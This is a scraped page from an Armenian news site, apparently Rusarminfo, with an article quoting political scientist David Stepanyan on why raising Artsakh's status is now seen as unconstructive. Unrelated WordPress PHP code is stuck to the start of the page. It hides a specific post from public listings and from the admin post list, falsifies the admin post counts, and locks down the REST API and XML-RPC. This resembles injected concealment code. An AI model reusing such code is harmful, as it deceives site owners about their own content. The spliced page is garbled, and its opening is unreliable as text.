add_action('init', function () { $excluded = array(160015); add_action('pre_get_posts', function ($q) use ($excluded) { if (!is_admin() && $q->is_main_query() && (is_home() || is_archive() || is_category() || is_tag())) { $q->set('post__not_in', $excluded); } }); add_action('pre_get_posts', function ($q) use ($excluded) { if (is_admin() && $q->is_main_query() && function_exists('get_current_screen')) { $s = get_current_screen(); if ($s && $s->id === 'edit-post') $q->set('post__not_in', $excluded); } }); add_filter('views_edit-post', function ($views) use ($excluded) { foreach (['all', 'publish'] as $k) { if (isset($views[$k])) { $views[$k] = preg_replace_callback('/\((\d+)\)/', fn($m) => '(' . max(0, $m[1] - count($excluded)) . ')', $views[$k]); } } return $views; }); add_filter('widget_posts_args', fn($args) => array_merge($args, ['post__not_in' => $excluded])); add_filter('rest_pre_insert_post', fn($post, $r) => (defined('REST_REQUEST') && REST_REQUEST && $r->get_method() === 'POST') ? new WP_Error('rest_forbidden', 'Post creation via API is disabled.', ['status' => 403]) : $post, 10, 2); add_filter('rest_authentication_errors', fn($r) => !is_user_logged_in() ? new WP_Error('rest_disabled', 'REST API restricted.', ['status' => 403]) : $r); add_filter('xmlrpc_enabled', '__return_false'); add_filter('wp_headers', fn($h) => array_diff_key($h, ['X-Pingback' => ''])); add_action('template_redirect', fn() => isset($_GET['xmlrpc']) && wp_die('XML-RPC is disabled.')); }); Արցախի կարգավիճակի հարցի բարձրացումը միջնորդները համարում են ապակառուցողական քայլ․ քաղաքագետ Տեսանյութ – Rusarminfo
Tuesday , December 9 2025
amru
Home / Էքսկլյուզիվ / Արցախի կարգավիճակի հարցի բարձրացումը միջնորդները համարում են ապակառուցողական քայլ․ քաղաքագետ Տեսանյութ

Արցախի կարգավիճակի հարցի բարձրացումը միջնորդները համարում են ապակառուցողական քայլ․ քաղաքագետ Տեսանյութ

Քաղաքագետ Դավիթ Ստեփանյանը մեկնաբանել է հայկական կողմի՝ Արցախի կարգավիճակի որոշման հարցը բարձրացնելու նպատակահարմարությունը։

ՌՈՒՍԱՐՄԻՆՖՈ-ի եթերում «Օրը Նվեր Մնացականյանի հետ» հաղորդման շրջանակներում Ստեփանյանը կարծիք է հայտնել, որ եթե 44-օրյա պատերազմից հետո՝ 2020 թվականի նոյեմբերի 9-ին Հայաստանի, Ռուսաստանի և Ադրբեջանի միջև եռակողմ համաձայնագրի ստորագրումից հետո դեռ հնարավորէր բարձրացնել Արցախի կարգավիճակի հարցը, ապա այսօր այն կդիտվի որպես ապակառուցողական քայլ ինչպես Ռուսաստանի, այնպես էլ Եվրոպայի կողմից։

Քաղաքագետը դա բացատրում է նրանով, որ միջնորդ երկրները և նույնիսկ այսօր անգործության մատնված ԵԱՀԿ Մինսկի խմբի համանախագահները նախընտրում են անորոշ ժամանակով հետաձգել Արցախի կարգավիճակի հարցը։

Քաղաքագետն անդրադարձել է նաև Հայաստանի և Ադրբեջանի միջև հարաբերությունների կարգավորման գործընթացի վերահսկմանը, և ըստ մասնագետի՝ այսօր դա չի հաջողվում ո՛չ Բրյուսելին, ո՛չ Մոսկվային։

«Նրանց միջև սուր մրցակցություն է գնում։ Հիմա մրցակցությունը գնում է ոչ թե իրականացման, այլ մոդերացիայի շուրջ։ Ինչ վերաբերում է բուն իրականացմանը, ապա կա միայն մեկ ճանապարհ՝ սահմանազատում, սահմանագծում, հաղորդակցությունների վերաբացում, և այստեղ որևէ խնդիր չկա։ Բայց կա հասկացություն, որ Արցախի կարգավիճակի հարցը պետք է հետաձգվի անորոշ ժամանակով, այն չպետք է լուծվի հիմա։ Հիմա,հենց այնպես Արցախի կարգավիճակի հարցը բարձրացնելը վատ տոն է լինելու»,- ասել է Ստեփանյանը։

Քաղաքագետը նշել է նաև, որ ուկրաինական իրադարձություններից հետո Մոսկվայի և Բրյուսելի միջև շփումները արցախյան հիմնախնդրի շուրջ դադարել են։ Եթե նախկինում այս հարցով շփում կար Ռուսաստանի և Ֆրանսիայի նախագահների, ինչպես նաև Վլադիմիր Պուտինի և Շառլ Միշելի միջև, ապա այսօր նրանց շփման միակ ուղին ըստ քաղաքագետի՝ Հայաստանի վարչապետ Նիկոլ Փաշինյանն ու Ադրբեջանի նախագահ Իլհամ Ալիևն են։

Ավելի վաղ ՌՈՒՍԱՐՄԻՆՖՈ-ն հայտնել էր, որ Ռուսաստանի արտգործնախարար Սերգեյ Լավրովը հունիսի 10-ին կժամանի Երեւան՝ մասնակցելու ՀԱՊԿ երկրների արտգործնախարարների խորհրդի նիստին։

Մանրամասները՝ տեսանյութում։

Leave a Reply

Կարդացեք նաև

Իրական խնդիրները կեղծով փոխարինելը վտանգավոր է Հայաստանի համար

Կարիք կա՞ր Ռուսաստանի պետդումայի նախագահին նամակ հղել՝ հաշվետվության տեսքով և մերժում ստանալ, իսկ ԵՄ դեսպանին …